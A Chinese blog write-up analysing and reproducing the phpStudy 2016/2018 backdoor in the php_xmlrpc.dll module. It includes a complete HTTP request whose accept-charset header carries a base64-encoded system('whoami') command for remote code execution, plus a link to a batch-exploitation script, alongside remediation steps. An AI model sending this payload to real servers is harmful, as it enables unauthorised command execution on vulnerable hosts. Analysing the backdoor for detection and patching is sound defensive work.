phpstudy后门分析与复现

小白白也要复现！

phpstudy简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer，一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。

威胁等级：严重
影响范围：phpstudy2016版、2018版
后门类型：C&C、命令执行
利用难度：极易

目前已知受影响的phpstudy版本：

• phpstudy 2016版php-5.4
• phpstudy 2018版php-5.2.17
• phpstudy 2018版php-5.4.45

后门模块分析

含后门的模块位置：\ext\php_xmlrpc.dll，至少在两个版本中存在该后门。

快速判断该模块中是否存在后门方法：记事本打开该.dll文件，搜索eval字符串，显示如下结果：

后门包：

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=/*这里就是要执行的命令base64加密*/
Connection: close
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

复现过程

开启我的phpstudy
哦豁，火绒是真的nb，病毒库更新这么迅速

但火绒未免也太小气了，病毒竟然命名为FakeStudy
phpstudy用的还是很舒服的。

添加一下信任区，继续我的复现之旅。

发个包过去瞅瞅：

哦豁，完蛋，我号没了:(

自动化利用

上面那样利用还是不够爽，写个python自动化脚本吧！
批量利用脚本链接：https://www.cnblogs.com/-qing-/p/11575622.html

脚本演示：

工具一把梭就是舒服，脚本小子实锤了。

修复建议

• 删除存在后门的模块
• 更新phpstudy到最新的2019版本
• 卸载phpstudy